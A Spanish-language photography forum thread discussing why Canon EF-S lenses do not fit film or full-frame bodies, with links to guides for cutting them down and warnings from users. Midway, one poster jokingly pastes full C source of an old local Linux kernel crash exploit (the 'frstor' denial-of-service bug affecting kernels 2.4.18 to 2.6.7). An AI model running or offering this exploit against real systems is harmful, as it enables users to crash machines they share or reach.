PDA

Ver la Versión Completa : Diferencias entre objetivos EF y EF-S



Michel
12/05/05, 22:40:58
La diferencia consiste en que los EF-S solo pueden ser montados en cámaras digitales porque incorporan un pequeño truco para que no sean compatibles.

Os adjunto una foto para que se entienda mejor.
http://www.pilila.com/foto/foro/Canon_EF-S_17-85_4-5'6_IS_USM.jpg
A la izquierda está el EF y a la derecha el EF-S.

Si alguien se atreve a serrar el plástico que le 'sobra' al EF-S su objetivo se comportará como un EF. Canon ideó EF-S según las malas lenguas (solo es un rumor, insisto) para vender objetivos que no pueden ser usados en cámaras EOS no digitales. Imaginaros que podeis vender barato el 18-55 del kit a alguien. Podríais ganar dinero en la operación (en el kit está valorado en 50€ aproximadamente de PVP) y todos contentos. Si intentais montar un EF-S en una cámara no digital, no os cabrá por el exceso de plástico ;-)

carlitos12
14/05/05, 00:24:04
Por si alguien se atreve visitar esta página http://www.bobatkins.com/photography/tutorials/efs-10d.html donde explican como hacerlo, creo que tenía otra donde estaba mejor pero ahora no la encuentro, bueno si la encuentro la pondré.

Michel
14/05/05, 01:04:49
Atención: este tema no es para practicarlo a la ligera. Yo no animo a nadie a hacerlo, es delicadísimo y los resultados no están garantizados. Una cosa es explicar diferencias y cómo solventarlas y otra, muy distinta, ponerlo en práctica. Quizás en mi mensaje anterior animaba, sin pretenderlo, a hacerlo pero os aseguro que no era mi intención.

¡Hombre avisado vale por dos!

jcarlosre
14/05/05, 21:49:41
Muchas gracias por despejarme la duda asistencial que tenía desde hace tiempo ... voy a echar un vistazo al vínculo aunque no creo que me meta con ello.

Por cierto, viviendo en este mundo de tecnología, ¿No ha hecho nadie un adaptador? ... lo venderian como rosquillas ... ¿No?

carlitos12
14/05/05, 22:46:27
Bueno ya he encontrado la dichosa página www.wrotniak.net/photo/infrared/#NEED son fotografias paso a paso de la modificación y fotos hechas con una 10D y el 18-55 EFS

Hasta pronto.

Michel
15/05/05, 10:39:03
Bueno ya he encontrado la dichosa página www.wrotniak.net/photo/infrared/#NEED son fotografias paso a paso de la modificación y fotos hechas con una 10D y el 18-55 EFS

Hasta pronto.

Revisa el enlace, yo no veo la modificación por ningun lado.

carlitos12
18/05/05, 00:52:47
Ops, disculpad aqui lo teneis http://members.cox.net/byteseller/EFS-WEB/EFS-WEB.html eso me pasa por tener veinte pestañas abiertas en el navegador, como con Linux no se cuelga je, je... :lol:

Michel
18/05/05, 11:46:54
Me ratifico, creo que esto solo es recomendable para manitas, lo cual no es mi caso :cry:

carlitos12
18/05/05, 14:45:47
Hombre tampoco parece tan complicado aunque creo que solo interesa a quienes tienen cuerpos analógicos, ya que un angular semejante para analógicas pues ya sabemos lo que nos clavan.

Hasta pronto.

Jesusele
10/06/05, 13:40:36
Miradlo por el lado contrario... lo único que se arriesga es el valor del 18-55, que tampoco es demasiado...

Lo digo esto porque yo no lo tengo y no me puedo plantear el hacerlo :lol:

vigape
10/06/05, 13:50:45
Buf, yo no me atrevo q me ha costado mucha pasta la camara para ahora arriesgarlo.

Por cierto carlitos... eso de k linux no se cuelga.... déjamelo tan solo 2 minutos y te lo cuelgo :wink: (aunque sería una discusión para largo)

Michel
10/06/05, 16:59:37
carlitos12+vigape: bueno como veo que esto está derivando en una conversación de informáticos os propongo un sistema para colgar Linux (aunque no sé de qué Linux se está hablando):

/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler
* inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/

/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)

#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)

#NO_APP
leave
ret
*/

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);

return 0;
}
// <<EOF

Para info completa:
http://linuxreviews.org/news/2004/06/11_kernel_crash/#toc1

Josemaru
27/04/06, 14:20:31
El bloqueo mecánico que tienen los objetivos EF-S para no ser montados en cámaras analógicas no es un capricho de los chicos de Marketing. Para rebajar el coste del objetivo, la parte anterior de este tipo de objetivos (la que va hacia el lado de la cámara) entra un poco en el cuerpo de la cámara. Ésto se puede hacer en cámaras con espejo pequeño (cosa que pasa en la mayor parte de las reflex digitales), en las cámara analógicas o de CMOS de tamaño completo el espejo, cuando el espejo se levanta para hacer la foto, puede golpear el objetivo y dañar la cámara. Para evitar este posible daño han diseñado los EF-S de tal manera que no se puedan montar en cámaras que no lo soportan. Los objetivos EF pueden montarse en cualquier cámara.

takumar
12/12/06, 01:39:11
Aparte de la razón de tamaño del objetivo ya aducida en este foro, seguramente existen otra razón óptica: los objetivos EFS están diseñados para un tamaño de sensor menor que 24x36mm y si se utilizan en este nuevo tamaño darán un viñeteo y falta de definición en los bordes casi con toda seguridad.

paco pastas
12/12/06, 20:46:45
quizás lo más práctico en caso de cambiar de máquina es vender el objetivo efs y comprar uno nuevo. La verdad es que hacer todo este montaje con el riesgo de poderte cargar el objetivo y la máquina no tiene demasiado sentido.

opticaintercambiable
24/12/10, 00:31:10
Puede que yo me equivoque pero recientemente adquirí una canon EOS 1000D y iene con un 18/55mm EFS y un 75/300 EF de fabrica y no me ha hecho falta serrar nada de nada.

mellamoa
24/12/10, 08:54:04
¿Has leído el hilo completo? :wink:

Los objetivos EF-S NO pueden montarse en cámaras reflex tradicionales (no digitales) o de sensor completo (5D, 1Ds). Tampoco pueden montarse en la serie 1D ni en la 10D. Bueno, no pueden montarse sin recortar el famoso trozo que sobra :)

Los objetivos EF SÍ pueden montarse en TODAS las cámaras.

Tú tienes un objetivo EF (75-300) que se puede montar en cualquier cámara (digital o no digital), y un objetivo EF-S (18-55) que solo puedes montar en cámaras digitales APS-C, entre las que está la 1000D

Espero habértelo aclarado